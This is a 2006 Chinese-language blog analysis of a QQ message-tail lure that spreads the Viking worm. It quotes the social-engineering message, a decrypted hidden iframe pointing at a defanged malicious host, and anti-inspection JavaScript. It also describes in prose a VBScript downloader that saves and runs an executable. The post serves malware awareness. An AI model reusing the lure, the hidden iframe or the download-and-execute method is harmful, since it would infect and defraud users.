传播蠕虫维金/Worm.Viking.cx的QQ尾巴再添花样

endurer　原创
2006-10-08　第1版

QQ自动发送的信息为：
/--------
看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了....

hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387**381/
--------/

点击该链接打开的网页首部有用自定义函数 psw（）加密的JavaScript脚本代码。解密后为：
/--------
＜iframe src＝hxxp://web***1.39***com.org/m***s/mm***.htm width＝0 height＝0＞＜/iframe＞
--------/

mm***.htm　　的开头为 HTMLShip 加密的脚本程序，分为两个部分：
前一部分　解密后的代码为JavaScript编写，解密后的代码如下：
/--------
＜script language＝javascript＞yS6＝5633;if（document.all）{function _dm（）{return false};function _mdm（）{document.oncontextmenu＝_dm;setTimeout（"_mdm（）",800）};_mdm（）;}document.oncontextmenu＝new Function（"return false"）;function _ndm（e）{if（document.layers||window.sidebar）{if（e.which!＝1）return false;}};if（document.layers）{document.captureEvents（Event.MOUSEDOWN）;document.onmousedown＝_ndm;}else{document.onmouseup＝_ndm;};oK74＝3345;dI39＝7346;function _dws（）{window.status ＝ "The page is protected by HTMLShip XP";setTimeout（"_dws（）",100）;};_dws（）;kY53＝6773;jQ9＝4206;function _dds（）{if（document.all）{document.onselectstart＝function （）{return false};setTimeout（"_dds（）",700）}};_dds（）;iD69＝5348;kH81＝489;aS87＝3348;mY34＝4488;lL93＝5630;bI58＝9632;sT64＝2490;;_licensed_to_＝"TEAM";＜/script＞＜html＞
--------/

后一部分　使用的是VBScript，其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web***1.3***9com.org/m***s/mm***1.exe 保存为 %temp%/g0ld.com，并利用Shell.Application 对象 的 ShellExecute 方法来运行。

Kaspersky 报为 Worm.Win32.Viking.y（http://www.viruslist.com/en/find?words=Worm.Win32.Viking.y）
瑞星报为 Worm.Viking.cx。